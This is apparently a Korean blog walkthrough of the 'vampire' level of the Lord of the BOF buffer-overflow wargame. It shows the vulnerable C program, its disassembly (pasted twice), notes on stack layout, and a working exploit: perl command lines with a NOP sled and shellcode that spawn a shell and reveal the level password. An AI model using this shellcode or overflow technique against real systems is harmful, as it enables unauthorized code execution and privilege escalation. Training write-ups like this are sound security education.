[troll@localhost troll]$ cat vampire.c
/*
The Lord of the BOF : The Fellowship of the BOF
- vampire
- check 0xbfff
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// here is changed!
if(argv[1][46] == '\xff')
{
printf("but it's not forever\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
/*
The Lord of the BOF : The Fellowship of the BOF
- vampire
- check 0xbfff
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// here is changed!
if(argv[1][46] == '\xff')
{
printf("but it's not forever\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
보면 return address가 0xbfff~ 면 차단을 하고 있다.
0xbf??~~ 이런 식이어야 한다.
그렇지만 스택의 default address는 0xbfff~~ 이다.
stack size를 늘려서 0xbf??~~ 로 만들어줘야 할 것 같다.
0x8048430 <main>: push %ebp
0x8048431 <main+1>: mov %ebp,%esp
0x8048433 <main+3>: sub %esp,40
0x8048436 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804843a <main+10>: jg 0x8048453 <main+35>
0x804843c <main+12>: push 0x8048520
0x8048441 <main+17>: call 0x8048350 <printf>
0x8048446 <main+22>: add %esp,4
0x8048449 <main+25>: push 0
0x804844b <main+27>: call 0x8048360 <exit>
0x8048450 <main+32>: add %esp,4
0x8048453 <main+35>: mov %eax,DWORD PTR [%ebp+12]
0x8048456 <main+38>: add %eax,4
0x8048459 <main+41>: mov %edx,DWORD PTR [%eax]
0x804845b <main+43>: add %edx,47
0x804845e <main+46>: cmp BYTE PTR [%edx],0xbf
0x8048461 <main+49>: je 0x8048480 <main+80>
0x8048463 <main+51>: push 0x804852c
0x8048468 <main+56>: call 0x8048350 <printf>
0x804846d <main+61>: add %esp,4
0x8048470 <main+64>: push 0
0x8048472 <main+66>: call 0x8048360 <exit>
---Type <return> to continue, or q <return> to quit---
0x8048477 <main+71>: add %esp,4
0x804847a <main+74>: lea %esi,[%esi]
0x8048480 <main+80>: mov %eax,DWORD PTR [%ebp+12]
0x8048483 <main+83>: add %eax,4
0x8048486 <main+86>: mov %edx,DWORD PTR [%eax]
0x8048488 <main+88>: add %edx,46
0x804848b <main+91>: cmp BYTE PTR [%edx],0xff
0x804848e <main+94>: jne 0x80484a7 <main+119>
0x8048490 <main+96>: push 0x8048549
0x8048495 <main+101>: call 0x8048350 <printf>
0x804849a <main+106>: add %esp,4
0x804849d <main+109>: push 0
0x804849f <main+111>: call 0x8048360 <exit>
0x80484a4 <main+116>: add %esp,4
0x80484a7 <main+119>: mov %eax,DWORD PTR [%ebp+12]
0x80484aa <main+122>: add %eax,4
0x80484ad <main+125>: mov %edx,DWORD PTR [%eax]
0x80484af <main+127>: push %edx
0x80484b0 <main+128>: lea %eax,[%ebp-40]
0x80484b3 <main+131>: push %eax
0x80484b4 <main+132>: call 0x8048370 <strcpy>
0x80484b9 <main+137>: add %esp,8
0x80484bc <main+140>: lea %eax,[%ebp-40]
---Type <return> to continue, or q <return> to quit---
0x80484bf <main+143>: push %eax
0x80484c0 <main+144>: push 0x804855f
0x80484c5 <main+149>: call 0x8048350 <printf>
0x80484ca <main+154>: add %esp,8
0x80484cd <main+157>: leave
0x80484ce <main+158>: ret
0x80484cf <main+159>: nop
0x8048431 <main+1>: mov %ebp,%esp
0x8048433 <main+3>: sub %esp,40
0x8048436 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804843a <main+10>: jg 0x8048453 <main+35>
0x804843c <main+12>: push 0x8048520
0x8048441 <main+17>: call 0x8048350 <printf>
0x8048446 <main+22>: add %esp,4
0x8048449 <main+25>: push 0
0x804844b <main+27>: call 0x8048360 <exit>
0x8048450 <main+32>: add %esp,4
0x8048453 <main+35>: mov %eax,DWORD PTR [%ebp+12]
0x8048456 <main+38>: add %eax,4
0x8048459 <main+41>: mov %edx,DWORD PTR [%eax]
0x804845b <main+43>: add %edx,47
0x804845e <main+46>: cmp BYTE PTR [%edx],0xbf
0x8048461 <main+49>: je 0x8048480 <main+80>
0x8048463 <main+51>: push 0x804852c
0x8048468 <main+56>: call 0x8048350 <printf>
0x804846d <main+61>: add %esp,4
0x8048470 <main+64>: push 0
0x8048472 <main+66>: call 0x8048360 <exit>
---Type <return> to continue, or q <return> to quit---
0x8048477 <main+71>: add %esp,4
0x804847a <main+74>: lea %esi,[%esi]
0x8048480 <main+80>: mov %eax,DWORD PTR [%ebp+12]
0x8048483 <main+83>: add %eax,4
0x8048486 <main+86>: mov %edx,DWORD PTR [%eax]
0x8048488 <main+88>: add %edx,46
0x804848b <main+91>: cmp BYTE PTR [%edx],0xff
0x804848e <main+94>: jne 0x80484a7 <main+119>
0x8048490 <main+96>: push 0x8048549
0x8048495 <main+101>: call 0x8048350 <printf>
0x804849a <main+106>: add %esp,4
0x804849d <main+109>: push 0
0x804849f <main+111>: call 0x8048360 <exit>
0x80484a4 <main+116>: add %esp,4
0x80484a7 <main+119>: mov %eax,DWORD PTR [%ebp+12]
0x80484aa <main+122>: add %eax,4
0x80484ad <main+125>: mov %edx,DWORD PTR [%eax]
0x80484af <main+127>: push %edx
0x80484b0 <main+128>: lea %eax,[%ebp-40]
0x80484b3 <main+131>: push %eax
0x80484b4 <main+132>: call 0x8048370 <strcpy>
0x80484b9 <main+137>: add %esp,8
0x80484bc <main+140>: lea %eax,[%ebp-40]
---Type <return> to continue, or q <return> to quit---
0x80484bf <main+143>: push %eax
0x80484c0 <main+144>: push 0x804855f
0x80484c5 <main+149>: call 0x8048350 <printf>
0x80484ca <main+154>: add %esp,8
0x80484cd <main+157>: leave
0x80484ce <main+158>: ret
0x80484cf <main+159>: nop
그리고 argv의 위치는. argv의 길이가 길면 길수록 앞쪽에 배치된다.
---------- //10
argv
... 등등 ebp esp
---------
~~
---------
main frame //1
Little Endian임을 명심하자.
그러기 때문에 argv가 길면 길수록 argv는 작은 주소에서 부터 시작한다.
r `perl -e 'print "\xbf"x44,"\xb1\x9c\xfe\xbf"'` `perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "a"x90000'`
r `perl -e 'print "\xbf"x44,"\xb1\x9c\xfe\xbf"'` `perl -e 'print "a"x90000'` `perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`
[troll@localhost troll]$ ./vampire `perl -e 'print "\xbf"x44,"\xb1\x9c\xfe\xbf"'` `perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "a"x90000'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿±œþ¿
bash$ my-pass
euid = 509
music world
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿±œþ¿
bash$ my-pass
euid = 509
music world
0xbffffc20
0xbffe9c44:
0xbffe4e24
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
| skeleton -> golem (0) | 2014.02.20 |
|---|---|
| vampire -> skeleton (0) | 2014.02.20 |
| orge -> troll (0) | 2014.02.20 |
| darkelf->orge (0) | 2014.02.20 |
| wolfman -> darkelf (0) | 2014.02.20 |
